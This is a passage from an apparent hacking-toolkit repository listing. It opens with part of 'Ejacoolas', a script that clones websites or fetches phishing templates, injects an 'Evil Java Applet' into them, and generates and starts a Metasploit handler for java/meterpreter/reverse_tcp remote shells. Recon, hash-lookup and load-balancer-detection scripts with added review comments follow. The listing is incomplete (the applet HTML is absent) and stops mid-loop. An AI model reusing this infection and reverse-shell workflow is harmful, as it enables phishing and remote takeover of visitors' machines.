#   that already exists (from an earlier run or created by another local user)
#   is reused together with whatever it already contains.
# - $cloneurl goes to wget unquoted and unvalidated.
440 | clonesite() {
441 | echo -e "\n\033[1;37mPlease enter the URL to clone (example: http://www.google.com) (enter \"back\" to return to previous menu):"
442 | read cloneurl
443 | if [ "$cloneurl" == "" ]; then
444 | clonesite
445 | fi
446 | if [ "$cloneurl" == "back" ]; then
447 | infectmenu
448 | fi
449 | echo -e "\033[1;37m[...] Attempting to clone $cloneurl..."
450 | mkdir /tmp/sitetmp 2>/dev/null
451 | wget --convert-links -w 3 --random-wait --no-dns-cache --referer="http://torpedo48.it" --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" -P /tmp/sitetmp -erobots=off -q -nH $cloneurl
# Success is judged by wget's exit status plus a non-empty /tmp/sitetmp/index.html.
452 | if [[ "$?" != "0" || ! -s /tmp/sitetmp/index.html ]]; then
453 | echo -e "\033[1;31m[!] Error encountered while cloneing URL $cloneurl . An \"index.html\" file couldn't be generated."
454 | cloneagain
455 | else echo -e "\033[1;32m[->] URL $cloneurl successfully cloned to /tmp/sitetmp/.\n"
456 | pathtoindex=/tmp/sitetmp
457 | infectpage
458 | fi
459 | }
460 |
461 | selectpage() {
462 | echo -e "\n\033[1;37mPlease enter the path to the web page you want to infect. Note that it must be named \"index.html\", or it won't be detected (you'll be able to change its name later). (enter \"back\" to return to previous menu)"
463 | read pathtoindex
464 | if [ "$pathtoindex" == "back" ]; then
465 | infectmenu
466 | elif [ "$pathtoindex" == "" ]; then
467 | selectpage
468 | elif [ ! -d $pathtoindex ]; then
469 | echo -e "\033[1;31m[!] The specified folder doesn't exist, please retry."
470 | selectpage
471 | elif [ ! -s $pathtoindex/index.html ]; then
472 | echo -e "\033[1;31m[!] No \"index.html\" file found in $pathtoindex.\n"
473 | selectpage
474 | else localpage=1
475 | echo -e "\033[1;32m[->] \"index.html\" file found in $pathtoindex\n"
476 | infectpage
477 | fi
478 | }
479 |
480 | infectmenu() {
481 | echo -e "\n\033[1;37mDo you want to infect a \033[4ml\033[0m\033[1;37mocal web page or to \033[4mc\033[0m\033[1;37mlone an online web page and infect it (enter \"back\" to return to previous menu)? [l|c|back]"
482 | read userinfectmenu
483 | case $userinfectmenu in
484 | back) outputmenu;;
485 | l) selectpage;;
486 | c) if [ "$silentmode" != "1" ]; then
487 | clonesite
488 | else echo -e "\033[1;31m[!] Warning: Silent Mode is ON. This feature requires data downloading from the Internet. Do you want to proceed? [y|n] (default: \"n\")\033[0;37m"
489 | read userchoice
490 | if [ "$userchoice" == "" ]; then
491 | userchoice=n
492 | fi
493 | case $userchoice in
494 | n) outputmenu;;
495 | y) echo -e "\n\n"
496 | clonesite;;
497 | *) outputmenu;;
498 | esac
499 | fi;;
500 | *) echo -e "Please insert your selection.\n"
501 | infectmenu;;
502 | esac
503 | }
504 |
505 | showcode() {
506 | echo -e "\033[1;37m\nThis is the HTML code you should add to a web page in order to infect it with the Evil Java Applet:
507 |
508 | \033[0;37m
509 |
510 | \033[1;37mRemember that it'll work only if your web page and \"$appletname.jar\" reside in the same folder.
511 |
512 | You need that code only if you plan to manually infect a web page with the Evil Java Applet: this script can do that for you (hopefully) if you choose option 2 in the menu.
513 |
514 | Press ENTER to return to the main menu...\n"
515 | read usercontinue
516 | outputmenu
517 | }
518 |
# starthandler: writes a Metasploit resource script to /tmp/$appletname.handler.rc,
# runs msfconsole on it from /pentest/, deletes the file afterwards and returns to
# outputmenu.
# Globals read: ip, port, appletname (set outside this function).
#
# Review notes:
# - The resource script fixes the listener to exploit/multi/handler with payload
#   java/meterpreter/reverse_tcp on $ip:$port, kept open for further sessions
#   (ExitOnSession false) and started as a background job (exploit -j).
# - The file is created with a plain redirection under a predictable /tmp name
#   and exists for as long as msfconsole runs; it is removed only when
#   msfconsole returns.
# - The result of `cd /pentest/` is not checked, and the directory change stays
#   in effect for the rest of the script.
519 | starthandler() {
520 | echo -e "\033[1;37m[...] Starting the handler..."
521 | echo "use exploit/multi/handler
522 | set LHOST $ip
523 | set LPORT $port
524 | set ExitOnSession false
525 | set payload java/meterpreter/reverse_tcp
526 | exploit -j" > /tmp/$appletname.handler.rc
527 | cd /pentest/
528 | msfconsole -r /tmp/$appletname.handler.rc
529 | rm /tmp/$appletname.handler.rc
530 | outputmenu
531 | }
532 |
533 | savehandler() {
534 | echo -e "\033[1;37mPlease specify the folder where you want to save the generated handler script (default: $defaultfolder):"
535 | read outputhandler
536 | if [[ "$outputhandler" == "" || "$outputhandler" == "$defaultfolder2" ]]; then
537 | outputhandler=$defaultfolder
538 | fi
539 | if [ "$outputhandler" == "$defaultfolder" ]; then
540 | mkdir $defaultfolder 2>/dev/null
541 | fi
542 | if [ ! -d $outputhandler ]; then
543 | echo -e "\033[1;31m[!] The specified folder doesn't exist, please retry.\n"
544 | savehandler
545 | else cp /tmp/$appletname.handler.sh $outputhandler/
546 | if [[ "$?" != "0" || ! -s $outputhandler/$appletname.handler.sh ]]; then
547 | echo -e "\033[1;31m[!] Error encountered while saving the Evil Java Applet handler script to $outputhandler, saving it to $defaultfolder..."
548 | outputhandler=$defaultfolder
549 | mkdir $defaultfolder 2>/dev/null
550 | cp /tmp/$appletname.handler.sh $outputhandler #AGGIUNGI ULTERIORE CONTROLLO!!!
551 | fi
552 | echo -e "\033[1;32m[->] $appletname.handler.sh successfully saved to $outputhandler!\n"
553 | handlersaved=1
554 | echo -e "\033[1;37mPlease note that that handler works only as long as your IP is $ip and your port $port is disposable.
555 |
556 | Press ENTER to return to the main menu...\n"
557 | read usercontinue
558 | outputmenu
559 | fi
560 | }
561 |
562 | createhandler() {
563 | echo -e "\033[1;37m\n[...] Generating the Evil Java Applet handler script..."
564 | echo "echo -e \"\033[1;37m[...] Starting the handler...\"
565 | echo \"use exploit/multi/handler
566 | set LHOST $ip
567 | set LPORT $port
568 | set ExitOnSession false
569 | set payload java/meterpreter/reverse_tcp
570 | exploit -j\" > /tmp/$appletname.handler2.rc
571 | cd /pentest/
572 | msfconsole -r /tmp/$appletname.handler2.rc
573 | rm /tmp/$appletname.handler2.rc" > /tmp/$appletname.handler.sh
574 | chmod +x /tmp/$appletname.handler.sh 2>/dev/null
575 | if [[ "$?" != "0" || ! -s /tmp/$appletname.handler.sh ]]; then
576 | echo -e "\033[1;31m[!] Error encountered while generating the Evil Java Applet handler script. Press ENTER to return to the main menu..."
577 | read usercontinue
578 | outputmenu
579 | else echo -e "\033[1;32m[->] $appletname.handler.sh successfully generated!\n"
580 | savehandler
581 | fi
582 | }
583 |
584 | templatesave() {
585 | echo -e "\033[1;37m\nPlease specify the folder where you want to save the infected template page. Existing files with the same names will be overwritten, so be careful! (default: $defaulttemplatedir):"
586 | read userpage
587 | if [[ "$userpage" == "" || "$userpage2" == "$defaulttemplatedir2" ]]; then
588 | userpage=$defaulttemplatedir
589 | fi
590 | if [ "$userpage" == "$defaulttemplatedir" ]; then
591 | mkdir $defaultfolder 2>/dev/null
592 | mkdir $defaulttemplatedir 2>/dev/null
593 | fi
594 | if [ ! -d $userpage ]; then
595 | echo -e "\033[1;31m[!] The specified folder doesn't exist, please retry."
596 | templatesave
597 | else mv $templatetmp/* $userpage/
598 | if [[ "$?" != "0" || ! -s $userpage/$appletname.jar || ! -s $userpage/index.html ]]; then
599 | echo -e "\033[1;31m[!] Error encountered while saving the infected page and the Evil Java Applet to $userpage. Saving them to $defaulttemplatedir..."
600 | userpage=$defaulttemplatedir
601 | mkdir $defaulttemplatedir 2>/dev/null
602 | mv $templatetmp/* $userpage/ #AGGIUNGI ULTERIORE CONTROLLO!!!
603 | fi
604 | fi
605 | echo -e "\033[1;32m[->] The infected template page along with the Evil Java Applet were successfully moved to $userpage.\n"
606 | echo -e "\033[1;37mPress ENTER to return to the main menu..."
607 | read userexit
608 | rm -R $templatetmp
609 | savepage="1"
610 | outputmenu
611 | }
612 |
# templateselection: downloads a template index from
# http://torpedo48.it/phishing/templates to /tmp/templatestmp, lists its entries,
# reads a selection from stdin, downloads and extracts the chosen archive into
# /tmp/t48_tmplt, copies /tmp/$appletname.jar next to it, appends to index.html,
# sets defaulttemplatedir/defaulttemplatedir2 and calls templatesave.
#
# Review notes (trust boundary on the machine that runs this):
# - Index and archive are fetched over plain HTTP with no checksum or signature
#   check, so whatever answers for that host name decides the file names, URLs
#   and archive content used below.
# - Fields parsed from the index are used unvalidated and unquoted: as array
#   subscripts ([$number]), inside grep patterns, as wget arguments, as the -O
#   file name and in the /root/Ejacoolas/... path. Unless these arrays are
#   declared associative elsewhere, bash evaluates such a subscript as an
#   arithmetic expression, so the first column needs a digits-only check
#   before it is used.
# - grep "^$number" is a prefix match: entry 1 also matches lines that start
#   with 10, 11, ..., so a field can end up holding several values.
# - /tmp/templatestmp and /tmp/t48_tmplt are fixed names in a shared directory.
# - As shown in this listing, the `echo "" >>` line appends only an empty line;
#   the messages around it refer to HTML code that is not present here
#   (presumably lost when the page was extracted).
613 | templateselection() {
614 | templatefile=/tmp/templatestmp
615 | echo -e "\033[1;37m[...] Looking for templates at torpedo48.it..."
616 | wget -q http://torpedo48.it/phishing/templates -O $templatefile
617 | if [ ! -s $templatefile ]; then
618 | echo -e "\033[1;31m[!] Error encountered while connecting to the database, returning to the main menu..."
619 | sleep 3
620 | echo -e "\n\n\n"
621 | outputmenu
622 | else echo -e "\n"
623 | fi
# First whitespace-separated column of every index line becomes the entry number.
624 | numbers=`awk '{print $1}' $templatefile`
625 | templatetmp=/tmp/t48_tmplt
626 | echo -e "\033[1;37m\nPlease select the template you want to use. Use the provided link for every template to see how it looks.\n"
627 |
# Columns 2-5 of the index: description (dots shown as spaces), download URL,
# archive file name, example URL.
628 | for number in $numbers
629 | do
630 | description[$number]=`grep "^$number" $templatefile | awk '{print $2}' | tr '.' ' '`
631 | descriptionpoint[$number]=`grep "^$number" $templatefile | awk '{print $2}'`
632 | filename[$number]=`grep "^$number" $templatefile | awk '{print $3}'`
633 | archive[$number]=`grep "^$number" $templatefile | awk '{print $4}'`
634 | url[$number]=`grep "^$number" $templatefile | awk '{print $5}'`
635 | echo "[$number]- ${description[$number]}
636 | (example link: ${url[$number]})"
637 | done
638 | echo "[99]- Back to main menu"
# tot is the last entry number seen, used as the upper bound for the selection.
639 | tot=$number
640 | read selecttemplate
641 | if [ "$selecttemplate" == "99" ]; then
642 | echo -e "\n\n\n"
643 | outputmenu
644 | elif [[ $selecttemplate -gt $tot || $selecttemplate -lt 1 ]]; then
645 | echo -e "That's not an option, please try again...\n\n"
646 | templateselection
647 | fi
648 | for number in $numbers
649 | do
650 | if [ "$selecttemplate" == "$number" ]; then
651 | echo -e "\033[1;37m\n[...] Downloading the selected template..."
652 | mkdir $templatetmp 2>/dev/null
653 | if [ ! -d $templatetmp ]; then
654 | echo -e "\033[1;31m[!] Error encountered while creating the temporary folder in /tmp/, returning to the main menu...\n\n\n"
655 | sleep 3
656 | outputmenu
657 | fi
658 | wget -P $templatetmp/ -q ${filename[$number]} -O $templatetmp/${archive[$number]}
659 | if [ "$?" != "0" ]; then
660 | echo -e "\033[1;31m[!] Error encountered while downloading the template from torpedo48.it, returning to the main menu...\n\n\n"
661 | sleep 3
662 | outputmenu
663 | fi
664 | echo -e "\033[1;37m\n[...] Extracting the compressed file...\n"
# The archive is unpacked as downloaded; its member list is not inspected first.
665 | cd $templatetmp
666 | tar -xzf $templatetmp/${archive[$number]}
667 | if [ "$?" != "0" ]; then
668 | echo -e "\033[1;31m[!] Error encountered while extracting the downloaded archive, returning to the main menu...\n\n\n"
669 | sleep 3
670 | outputmenu
671 | fi
672 | rm $templatetmp/${archive[$number]}
673 | echo -e "\033[1;37m[...] Attempting to infect the web page with the Evil Java Applet..."
674 | cp /tmp/$appletname.jar $templatetmp/ 2>/dev/null
675 | if [[ "$?" != "0" || ! -s $templatetmp/$appletname.jar ]]; then
676 | echo -e "\033[1;31m[!] Error encountered while copying $appletname.jar to $templatetmp/, you'll have to manually infect the web page (actually in $templatetmp)with the Evil Java Applet.\n"
677 | outputmenu
678 | else echo "" >> $templatetmp/index.html
679 | if [ "$?" != "0" ]; then
680 | echo -e "\033[1;31m[!] Error encountered while adding some evil HTML code to $templatetmp/index.html. You'll have to do that manually.
681 |
682 | \033[1;37mThis is the evil HTML code:
683 |
684 | \033[0;37m
685 |
686 | \033[1;37mAdd it to $templatetmp/index.html and it will be infected with the Evil Java Applet. Remember to keep the infected index.html file and \"$appletname.jar\" always in the same folder (actually they're both in $templatetmp/).\n"
687 | outputmenu
688 | else echo -e "\033[1;32m[->] Web page successfully infected!\n"
689 | fi
690 | fi
# Default save location is derived from the index's description column.
691 | defaulttemplatedir=/root/Ejacoolas/${descriptionpoint[$number]}
692 | defaulttemplatedir2=/root/Ejacoolas/${descriptionpoint[$number]}/
693 | rm $templatefile
694 | templatesave
695 | fi
696 | done
697 | }
698 |
699 | outputmenu() {
700 | localpage="0"
701 | echo -e "\033[1;37m\nWhat do you want to do now?\n"
702 |
703 | if [ "$appletsaved" != "1" ]; then
704 | echo -e "\033[1;37m[1]- Save the Evil Java Applet to a directory for future use"
705 | else echo -e "\033[1;37m[1]- \033[1;9;37mSave the Evil Java Applet to a directory for future use\033[0m"
706 | fi
707 | if [ "$savepage" != "1" ]; then
708 | echo -e "\033[1;37m[2]- Infect a web page (local or cloned) with the Evil Java Applet"
709 | else echo -e "\033[1;37m[2]- Infect another web page (local or cloned) with the Evil Java Applet"
710 | fi
711 | echo -e "\033[1;37m[3]- Download a phishing template from torpedo48.it and infect it"
712 | echo -e "\033[1;37m[4]- Show the HTML code that triggers the Evil Java Applet"
713 | echo -e "\033[1;37m[5]- Start an Evil Java Applet handler"
714 | echo -e "\033[1;37m[6]- Create a script for starting an Evil Java Applet handler"
715 | echo -e "\033[1;37m[7]- Discard current Applet and create a new one"
716 | echo -e "\033[1;37m[9]- Exit from Ejacoolas"
717 | echo -e "\n"
718 | read usermenu
719 | case $usermenu in
720 | 1) if [ "$appletsaved" != "1" ]; then
721 | saveapplet
722 | else echo -e "$appletname.jar already saved to $outputfolder!\n"
723 | outputmenu
724 | fi;;
725 | 2) infectmenu;;
726 | 3) if [ "$silentmode" != "1" ]; then
727 | templateselection
728 | else echo -e "\033[1;31m[!] Warning: Silent Mode is ON. This feature requires data downloading from the Internet. Do you want to proceed? [y|n] (default: \"n\")\033[0;37m"
729 | read userchoice
730 | if [ "$userchoice" == "" ]; then
731 | userchoice=n
732 | fi
733 | case $userchoice in
734 | n) outputmenu;;
735 | y) echo -e "\n\n"
736 | templateselection;;
737 | *) outputmenu;;
738 | esac
739 | fi;;
740 | 4) showcode;;
741 | 5) starthandler;;
742 | 6) createhandler;;
743 | 7) echo -e "\033[1;31m[!] Warning: do you really want to discard the current Evil Java Applet? [y|n] (default: \"n\")\033[0m"
744 | read discardapplet
745 | if [ "$discardapplet" == "" ]; then
746 | discardapplet="n"
747 | fi
748 | case $discardapplet in
749 | y) rm /tmp/$appletname.jar 2>/dev/null
750 | appletsaved=0
751 | savepage=0
752 | echo -e "\n\n"
753 | createapplet
754 | outputmenu;;
755 | n) outputmenu;;
756 | *) outputmenu;;
757 | esac;;
758 | 9) if [[ "$appletsaved" == "1" || "$savepage" == "1" ]]; then
759 | cleanup
760 | exit
761 | else echo -e "\033[1;31m[!] Warning: you haven't exported your applet yet. If you exit now, it will be deleted. Do you really want to exit? [y|n] (default: \"n\")\033[0m"
762 | read userexit2
763 | if [ "$userexit2" == "" ]; then
764 | userexit2="n"
765 | fi
766 | case $userexit2 in
767 | y) cleanup
768 | exit;;
769 | n) outputmenu;;
770 | *) outputmenu;;
771 | esac
772 | fi;;
773 | *) echo -e "Please insert a valid selection.\n"
774 | outputmenu;;
775 | esac
776 | }
777 |
778 | if [ "$imported" == "1" ]; then
779 | outputmenu
780 | else createapplet
781 | outputmenu
782 | fi
783 |
784 |
785 | ###NOTES
786 |
787 | #AGGIUNGI AL CODICE HTML DELL'APPLET IL REDIRECT ALLA PAGINA ORIGINALE, CHE FA FIGO!!
788 | #AGGIUNGI TRUE ONLINE MODE (WAN MODE)
789 | #AGGIUNGI LO SPOSTAMENTO AUTOMATICO IN var/www e L'AVVIO DI APACHE
790 | #AGGIUNGI UNA MODALITà DNS CACHE POISONING AUTOMATICA
791 |
792 |
--------------------------------------------------------------------------------
/hackpack/hackpack/enum.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
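# em3rgency's domain enumeration menu: asks for a target and runs whois, dig,
# host, tcptraceroute, dnsenum, fierce, nmap (or all of them plus lbd,
# list-urls, amap and httprint) against it.
#
# Changes against the original listing:
#  - the target and interface names are validated and every expansion is
#    quoted, so input cannot be split into extra arguments, start with "-" and
#    be read as an option, or steer the "-oG <target>.txt" output file to
#    another path;
#  - the menu is a loop instead of re-running ./enum.sh, which could not be
#    found any more once an option had changed into a tool directory;
#  - tool directories are entered in a subshell, so the script's own working
#    directory never changes;
#  - an empty or unknown menu choice no longer produces a "[" syntax error.

clear
# Terminal colour settings.
RED=$(tput setaf 1 && tput bold)
GREEN=$(tput setaf 2 && tput bold)
STAND=$(tput sgr0)
BLUE=$(tput setaf 6 && tput bold)

# Host name or dotted address: starts and ends with an alphanumeric character.
readonly TARGET_RE='^[A-Za-z0-9]([A-Za-z0-9.-]*[A-Za-z0-9])?$'
# Network interface name such as eth0 or wlan0.
readonly IFACE_RE='^[A-Za-z0-9][A-Za-z0-9_.:-]*$'
# Interface used by "Enumerate ALL"; the original hard-coded eth0.
readonly DEFAULT_IFACE=${ENUM_IFACE:-eth0}

# Print the start-up banner.
show_banner() {
  echo ""
  echo ""
  echo ""
  echo "${RED} +##############################################+"
  echo "${RED} + em3rgency's Domain enumeration script +"
  echo "${RED} + +"
  echo "${RED} + Version 1.0 +"
  echo "${RED} + +"
  echo "${RED} + www.em3rgency.com +"
  echo "${RED} +##############################################+"
  echo ""
  echo "${BLUE} Visit http://www.em3rgency.com for updates to this script. Thanks"
  echo ""
  echo "${BLUE} This script will perform various reconnaissance on your target domain."
}

# Print the option menu.
show_menu() {
  echo ""
  echo "${RED} **************************************"
  echo "${RED} * 1. WHOIS lookup *"
  echo "${RED} * 2. Dig and host list *"
  echo "${RED} * 3. TCP traceroute *"
  echo "${RED} * 4. DNS enumeration *"
  echo "${RED} * 5. Fierce *"
  echo "${RED} * 6. Nmap *"
  echo "${RED} * 7. Enumerate ALL *"
  echo "${RED} * 8. EXIT *"
  echo "${RED} **************************************"
  echo "${BLUE} Select Menu Option:${STAND}"
}

# Two blank lines between tool outputs.
gap() {
  echo ""
  echo ""
}

# Wait for ENTER, then clear the screen before the menu is shown again.
pause() {
  read -r -p "Please press ENTER to return to the menu"
  clear
}

# Read the target into the global `target`; returns 1 when it is not a plain
# host name or address.
read_target() {
  echo "Enter the target EG. domain.org"
  IFS= read -r target || return 1
  if [[ ! "$target" =~ $TARGET_RE ]]; then
    echo "Invalid target: use letters, digits, '.' and '-' only." >&2
    return 1
  fi
}

# Read the interface name into the global `IFACE`; returns 1 when it does not
# look like an interface name.
read_iface() {
  echo "${STAND}Please type the name of your network interface Example: eth0 "
  IFS= read -r IFACE || return 1
  if [[ ! "$IFACE" =~ $IFACE_RE ]]; then
    echo "Invalid interface name." >&2
    return 1
  fi
}

# Run a command inside a directory without changing the script's own cwd.
# $1 - directory, remaining arguments - command line.
in_dir() {
  local dir=$1
  shift
  (cd -- "$dir" && "$@")
}

run_dnsenum() {
  in_dir /pentest/enumeration/dns/dnsenum \
    perl dnsenum.pl --enum -f dns.txt --update a -r "$target"
}

run_fierce() {
  in_dir /pentest/enumeration/dns/fierce perl fierce.pl -dns "$target"
}

# The grepable report is written to /root/<target>.txt.
run_nmap() {
  in_dir /root nmap -PN -n -F -T4 -sV -A -oG "${target}.txt" "$target"
}

# Option 7: every check in the original order; a failing step does not stop
# the ones after it.
enumerate_all() {
  gap
  whois "$target"
  gap
  dig "$target" any
  gap
  host -l "$target"
  gap
  tcptraceroute -i "$DEFAULT_IFACE" "$target"
  gap
  run_dnsenum
  gap
  echo "dnstracer $target"
  dnstracer "$target"
  gap
  run_fierce
  gap
  in_dir /pentest/enumeration/web/lbd ./lbd.sh "$target"
  gap
  in_dir /pentest/enumeration/list-urls ./list-urls.py "http://www.${target}"
  gap
  run_nmap
  gap
  in_dir /root amap -i "${target}.txt"
  gap
  in_dir /pentest/enumeration/web/httprint/linux \
    ./httprint -h "www.${target}" -s signatures.txt -P0
  gap
}

show_banner
sleep 3
clear

while true; do
  show_menu
  IFS= read -r menuoption || exit 0
  case "$menuoption" in
    1)
      if read_target; then
        whois "$target"
        echo ""
      fi
      pause
      ;;
    2)
      if read_target; then
        dig "$target" any
        gap
        host -l "$target"
        echo ""
      fi
      pause
      ;;
    3)
      if read_target; then
        echo ""
        if read_iface; then
          gap
          tcptraceroute -i "$IFACE" "$target"
        fi
      fi
      pause
      ;;
    4)
      if read_target; then
        echo ""
        run_dnsenum
        echo ""
      fi
      pause
      ;;
    5)
      if read_target; then
        echo ""
        run_fierce
        echo ""
      fi
      pause
      ;;
    6)
      if read_target; then
        echo ""
        run_nmap
        echo ""
      fi
      pause
      ;;
    7)
      if read_target; then
        enumerate_all
      fi
      pause
      ;;
    8)
      exit
      ;;
    *)
      echo "Please select an option from 1 to 8."
      ;;
  esac
done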
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 |
--------------------------------------------------------------------------------
/hackpack/hackpack/googli.pl:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl
2 |
3 | use LWP::UserAgent;
4 | use HTTP::Request::Common;
5 | use LWP::Simple;
6 |
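# Looks up a hash on the goog.li web service and prints the value the service
# returns for it.
#
# Data-handling note: the hash leaves the machine here. It is sent as a query
# parameter to a third-party service, so that service and anything logging its
# requests sees every value that is looked up.

system('clear');
print " #################################################\n";
print " # www.Top-Hat-Sec.com #\n";
print " # #\n";
print " # by :xd00sry #\n";
print " #################################################\n";


print "\e[1;34m==> \e[0m\e[1;40mEnter the hash :\e[0m";
# NOTE(review): the listing shows "$hash=;", which does not parse; the read
# from standard input appears to have been lost when the page was extracted.
$hash = <STDIN>;
$hash = '' unless defined $hash;    # end of input without a line
chomp($hash);                       # chop() would eat a real character when
                                    # the last line has no trailing newline
$hash =~ s/^\s+|\s+$//g;
if ($hash eq '')
{
    print "\e[1;33m [!] Error No Hash entered!\e[0m\n";
    exit(0);
}

print "\e[1;41m Ok !\e[0m\n";
# Percent-encode the value so characters such as "&", "#" or spaces cannot
# change the query string.
($query = $hash) =~ s/([^A-Za-z0-9\-_.~])/sprintf('%%%02X', ord($1))/ge;
$url = "https://goog.li/?q=$query";
$lwp = LWP::UserAgent->new();
$lwp->timeout(15);
$lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
$connect = $lwp -> get($url);

print "====> ";
if (!$connect->is_success)
{
    # Keep a transport or HTTP error apart from "hash not found".
    print "Result : \e[1;31mRequest failed: " . $connect->status_line . "\e[0m\n";
}
# NOTE(review): the start of this pattern looks truncated in the listing (the
# opening tags are probably missing); it is kept exactly as shown.
elsif ($connect->content =~ /(.*)<\/b><\/span><\/abbr>/)
{
    # The match comes from the remote response: drop non-printable bytes
    # before writing it to the terminal.
    ($result = $1) =~ s/[^[:print:]]//g;
    print "Result : \e[0m\e[1;32;40m$result\e[0m\n";
} else {
    print "Result : \e[1;31mHash not Found\e[0m\n";
}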
37 |
--------------------------------------------------------------------------------
/hackpack/hackpack/ipchecker.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
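# Prints the public IP address as reported by checkip.dyndns.org.
#
# Changes against the original listing:
#  - the request has a time limit and its failure is reported instead of
#    printing an empty line;
#  - the lookup runs over plain HTTP, so the reply is treated as untrusted:
#    only a value made of address characters is printed, never raw response
#    text.

clear



echo "######################################"
echo "# http://www.top-hat-sec.com #"
echo "# Email: admin@top-hat-sec.com #"
echo "# Challenge = Opportunity #"
echo "######################################"

echo ""
echo ""
echo "Checking Assigned ISP IP Address"
echo "This may take a few seconds"
echo ""

response=$(curl -s --max-time 15 checkip.dyndns.org) || response=""

# Keep only what sits between "Current IP Address: " and the next tag.
public_ip=$(printf '%s\n' "$response" \
  | sed -n -e 's/.*Current IP Address: \([^<]*\)<.*/\1/p' \
  | head -n 1)

if [[ "$public_ip" =~ ^[0-9A-Fa-f:.]+$ ]]; then
  echo "Your IP is: "
  printf '%s\n' "$public_ip"
  echo ""
else
  echo "If you do not see your IP address, you may not be connected to the internet." >&2
  exit 1
fi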
22 |
23 |
24 |
--------------------------------------------------------------------------------
/hackpack/hackpack/lbd.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # lbd (load balancing detector) detects if a given domain uses
3 | # DNS and/or HTTP Load-Balancing (via Server: and Date: header and diffs between server answers)
4 | # Copyright (C) 2010 Stefan Behte
5 | #
6 | # This program is free software; you can redistribute it and/or
7 | # modify it under the terms of the GNU General Public License
8 | # as published by the Free Software Foundation; either version 2
9 | # of the License, or (at your option) any later version.
10 | #
11 | # This program is distributed in the hope that it will be useful,
12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | # GNU General Public License for more details.
15 | #
16 | # You should have received a copy of the GNU General Public License
17 | # along with this program; if not, write to the Free Software
18 | # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
19 | #
20 | # License: GNU General Public License, version 2
21 | # http://www.gnu.org/licenses/gpl-2.0.html
22 | #
23 | # Contact me, if you have any new ideas, bugs/bugfixes, recommondations or questions!
24 | # Please also contact me, if you just like the tool. :)
25 | #
26 | # Stefan dot Behte at gmx dot net
27 | #
28 | # 0.1: - initial release
29 | # 0.2: - fix license for fedora
30 | # - fix indenting
31 | #
32 |
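# Main body of lbd: checks a domain for DNS round-robin and for three HTTP
# signs of load balancing (differing Server headers, a Date header that goes
# backwards, differing response headers), then prints a summary.
#
# Usage: lbd.sh <domain>
#
# Changes against the original listing. Everything read from the remote
# server is untrusted input to this script:
#  - the Date value was used as a printf format string and inside $[ ... ];
#    it is now printed with '%s' and must match HH:MM:SS before any
#    arithmetic is done on it;
#  - the Server value was used as a grep regular expression; it is now
#    matched as a fixed string;
#  - control characters (CR, terminal escape sequences) are removed from
#    responses before they are stored or printed;
#  - the scratch files were .log/.nlog in the current directory; they now
#    live in a private mktemp directory that is removed on every exit path;
#  - the domain argument is validated and quoted, and nc gets a timeout so
#    a server that never closes the connection cannot hang the run.

QUERIES=50
DOMAIN=$1
NC_TIMEOUT=5
found_methods=()

echo
echo "lbd - load balancing detector 0.2 - Checks if a given domain uses load-balancing."
echo " Written by Stefan Behte (http://ge.mine.nu)"
echo " Proof-of-concept! Might give false positives."

if [ "$1" = "" ]
then
  echo "usage: $0 [domain]"
  echo
  exit 255 # same status the original "exit -1" produced under bash
fi

# A leading "-" would be read as an option by host and nc.
if [[ ! "$DOMAIN" =~ ^[A-Za-z0-9]([A-Za-z0-9.:-]*[A-Za-z0-9])?$ ]]
then
  echo "lbd: '$DOMAIN' is not a valid host name or address" >&2
  exit 255
fi

workdir=$(mktemp -d) || {
  echo "lbd: cannot create a temporary directory" >&2
  exit 1
}
trap 'rm -rf -- "$workdir"' EXIT
log="$workdir/log"
nlog="$workdir/nlog"

# Send one HEAD request to port 80 and write the raw response to stdout.
head_request() {
  printf 'HEAD / HTTP/1.0\r\n\r\n' | nc -w "$NC_TIMEOUT" "$DOMAIN" 80
}

# Remove control characters except tab and newline from stdin.
sanitize() {
  tr -d '\000-\010\013-\037\177'
}

echo -e -n "\nChecking for DNS-Loadbalancing:"
NR=$(host "$DOMAIN" | grep -c "has add")

if ((NR > 1))
then
  found_methods+=("DNS")
  echo " FOUND"
  host "$DOMAIN" | grep "has add"
  echo
else
  echo " NOT FOUND"
fi

echo -e "Checking for HTTP-Loadbalancing [Server]: "
: > "$log"
for ((i = 0; i < QUERIES; i++))
do
  head_request | sanitize > "$nlog"
  server=$(grep -i -m 1 "Server:" "$nlog" | cut -d: -f2-)
  server=${server# }

  # Print each distinct Server value once.
  if [[ -n "$server" ]] && ! grep -F -q -- "$server" "$log"
  then
    echo " ${server}"
  fi
  cat "$nlog" >> "$log"
done

NR=$(sort -u "$log" | grep -c "Server:")

if ((NR > 1))
then
  echo " FOUND"
  found_methods+=("HTTP[Server]")
else
  echo " NOT FOUND"
fi
echo
rm -f -- "$nlog" "$log"


echo -e -n "Checking for HTTP-Loadbalancing [Date]: "
prev_secs=0

for ((i = 0; i < QUERIES; i++))
do
  # Field 6 of "Date: Tue, 15 Nov 1994 08:12:31 GMT" is the time of day.
  stamp=$(head_request | sanitize | grep "Date:" | awk '{print $6}' | head -n 1)

  if [[ "$stamp" =~ ^([0-9]{1,2}):([0-9]{1,2}):([0-9]{1,2})$ ]]
  then
    printf '%s, ' "$stamp"
    # 10# forces base 10 so "08" and "09" are not read as octal.
    secs=$((10#${BASH_REMATCH[1]} * 3600 + 10#${BASH_REMATCH[2]} * 60 + 10#${BASH_REMATCH[3]}))

    # A clock that goes backwards between two answers means two servers.
    if ((secs < prev_secs))
    then
      echo "FOUND"
      found_methods+=("HTTP[Date]")
      break
    fi
    prev_secs=$secs
  else
    # Missing or malformed Date header: nothing to compare for this query.
    printf '?, '
  fi

  if ((i == QUERIES - 1))
  then
    echo "NOT FOUND"
  fi
done


echo -e -n "\nChecking for HTTP-Loadbalancing [Diff]: "
for ((i = 0; i < QUERIES; i++))
do
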